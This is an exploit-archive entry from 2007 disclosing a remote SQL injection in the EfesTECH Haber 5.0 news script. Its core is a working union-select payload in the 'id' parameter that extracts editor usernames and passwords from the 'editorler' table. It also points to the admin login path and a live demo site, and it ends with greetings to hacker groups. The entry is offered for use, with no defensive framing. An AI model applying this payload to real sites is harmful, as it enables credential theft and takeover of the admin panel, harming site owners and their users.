EfesTECH Haber 5.0 (id) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : EfesTECH Haber 5.0 (id) Remote SQL Injection Vulnerability
# Published : 2007-05-14
# Author : CyberGhost
# Previous Title : XOOPS Module Glossarie <= 1.7 (sid) Remote SQL Injection Exploit
# Next Title : NagiosQL 2005 2.00 (prepend_adm.php) Remote File Inclusion Vuln

#Title: EfesTECH Haber v5,0 Remote SQL Injection Vulnerability
#Author: CyberGhost
#Demo Page: http://www.haberguvercini.com
#Script Page: http://aspindir.com/indir.asp?id=4899&sIslem=%DDndir

#Vuln.

#Username - Password:/?efestech=haber&id=-1+union+select+0,kulladi,2,3,sifre,5,6,7,8,9,0,1,2,3,4+from+editorler
#Admin Login : /editor
====================================
Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR

And All TURKISH HACKERS !

# www.Syue.com [2007-05-14]